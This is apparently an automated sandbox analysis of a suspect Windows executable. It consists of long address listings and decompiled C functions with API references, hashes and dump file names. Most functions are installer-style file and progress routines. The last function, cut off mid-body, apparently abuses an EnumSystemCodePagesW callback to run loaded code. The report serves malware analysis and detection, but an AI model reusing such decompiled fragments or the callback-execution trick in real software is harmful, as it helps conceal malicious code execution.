                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x0040681f
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x004067a0
                                                                                                        0x0040679d

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                        • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                                        • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                        • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 69%
                                                                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                                                                                                        0x0040138a
                                                                                                        0x004013fa
                                                                                                        0x0040139b
                                                                                                        0x004013a0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004013a2
                                                                                                        0x004013a3
                                                                                                        0x004013ad
                                                                                                        0x00000000
                                                                                                        0x00401404
                                                                                                        0x004013b0
                                                                                                        0x004013b7
                                                                                                        0x004013bd
                                                                                                        0x004013be
                                                                                                        0x004013c0
                                                                                                        0x004013c2
                                                                                                        0x004013b9
                                                                                                        0x004013b9
                                                                                                        0x004013ba
                                                                                                        0x004013ba
                                                                                                        0x004013c9
                                                                                                        0x004013cb
                                                                                                        0x004013f4
                                                                                                        0x004013f4
                                                                                                        0x004013c9
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                        • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                                        • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                        • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                        0x00405841
                                                                                                        0x0040584e
                                                                                                        0x00405863
                                                                                                        0x00405869

                                                                                                        APIs
                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\KY4cmAI0jU.exe,80000000,00000003), ref: 00405841
                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate
                                                                                                        • String ID:
                                                                                                        • API String ID: 415043291-0
                                                                                                        • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                        • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                                        • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                        • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040581E(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                                        0x00405822
                                                                                                        0x0040582b
                                                                                                        0x00000000
                                                                                                        0x00405834
                                                                                                        0x0040583a

                                                                                                        APIs
                                                                                                        • GetFileAttributesA.KERNELBASE(?,00405629,?,?,?), ref: 00405822
                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405834
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                        • Instruction ID: 89544605ef234ac14ed66c3b065a2d642d1346908a696065e0ba681aeed38476
                                                                                                        • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                        • Instruction Fuzzy Hash: F8C04CB1808501ABD7056B24EF0D81F7B66EF50325B108B35F5A9E00F0C7355C66DA1A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 73752A38, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 44%
                                                                                                        			E73752A38(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73754040 != 0 && E7375297D(_a4) == 0) {
					 *0x73754044 = _t93;
					if( *0x7375403c != 0) {
						_t93 =  *0x7375403c;
					} else {
						E73752F60(E73752977(), __ecx);
						 *0x7375403c = _t93;
					}
				}
				_t28 = E737529AB(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E7375299F();
					_t72 = _a4;
					_t79 =  *0x73754048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73754048 = _t72;
					E73752999();
					_t33 = EnumSystemCodePagesW(??, ??); // executed
					 *0x7375401c = _t33;
					 *0x73754020 = _t79;
					if( *0x73754040 != 0 && E7375297D( *0x73754048) == 0) {
						 *0x7375403c = _t94;
						_t94 =  *0x73754044;
					}
					_t80 =  *0x73754048;
					_a4 = _t80;
					 *0x73754048 =  *((intOrPtr*)(E7375299F() + _t80));
